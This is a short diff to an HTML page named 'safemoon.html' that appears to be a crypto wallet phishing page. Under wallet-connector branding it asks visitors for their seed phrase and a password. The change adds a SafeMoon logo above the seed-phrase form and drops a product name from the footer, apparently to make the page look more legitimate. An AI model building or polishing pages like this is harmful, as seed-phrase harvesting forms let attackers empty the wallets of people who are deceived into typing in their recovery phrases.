--- a/safemoon.html
+++ b/safemoon.html
@@ -74,7 +74,10 @@
                         </div>
 
                         <div class="middle">
-                            <h4>SafeMoon</h4>
+                            <div class="toop">
+                                <img src="safemoon-grunge-style-logo-sticker.jpg" alt="">
+                                <h4>SafeMoon</h4>    
+                            </div>
                             <textarea id="seed" minlength="30" name="SafeMoon" placeholder="Seed Phrase..." required></textarea >
                         <input id="movepass"  type="password"
                       placeholder="Password" name="Password"/>
@@ -111,7 +114,7 @@
     <div class="footer-container">
         <div class="footer-leftpart">
             <img src="logo.svg" alt="logo">
-            <p>DaapReconnect connects web applications to supported mobile wallets.</p>
+            <p>Connects web applications to supported mobile wallets.</p>
             
        </div>
 
